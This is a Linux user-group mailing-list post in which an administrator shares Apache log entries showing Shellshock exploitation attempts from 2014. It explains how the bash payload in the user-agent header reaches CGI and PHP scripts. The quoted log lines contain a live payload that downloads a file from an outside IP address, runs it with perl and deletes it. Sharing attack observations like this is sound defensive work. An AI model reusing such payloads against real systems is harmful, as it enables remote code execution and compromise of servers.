I have seen numerous attempts in my apache logs to exploit vulnerable
CGI scripts:
access_log.1.gz:74.201.85.69 - - [26/Sep/2014:07:19:53 -0600] "GET
/cgi-bin/php HTTP/1.0" 503 1085 "-" "() { :;}; /bin/bash -c \"wget -O
/var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\""
access_log.1.gz:74.201.85.69 - - [26/Sep/2014:07:19:53 -0600] "GET
/cgi-bin/php.fcgi HTTP/1.0" 503 1095 "-" "() { :;}; /bin/bash -c \"wget
-O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf
/var/tmp/wow1\""
etc. The exploit itself is in the useragent string of the request,
which gets passed to the CGI via an environment variable. Any PHP
script that executes system() will cause the exploit to run as well, as
PHP also puts the user agent string in the environment, which system()
inherits.
Oddly enough I've seen no attempts in the last couple of days. Does
that mean the initial wave was from a single botnet?
Here's an example of the DHCP exploit:
https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
Not quite as remote exploitable but still dangerous.
/*
PLUG: http://plug.org, #utah on irc.freenode.net
Unsubscribe: http://plug.org/mailman/options/plug
Don't fear the penguin.
*/
